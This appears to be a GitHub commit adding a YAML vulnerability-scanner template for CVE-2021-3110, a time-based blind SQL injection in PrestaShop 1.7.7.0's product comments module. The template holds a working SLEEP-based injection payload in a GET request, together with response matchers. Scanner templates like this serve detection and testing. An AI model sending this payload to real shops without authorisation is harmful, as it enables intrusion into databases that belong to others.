CVE-2021-3110 Blind Sqli

patch-1
jaimin4949 2021-02-18 01:57:08 +05:30 committed by GitHub
parent 6416f1f101
commit 72c56e0ff0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: cve-2021-3110
info:
name: prestshop CMS SQL Injection
author: Jaimin Gondaliya
severity: high
description: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)"
matchers-condition: and
matchers:
- type: word
words:
- "average_grade"
- "1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)"
condition: and
part: body
- type: status
status:
- 200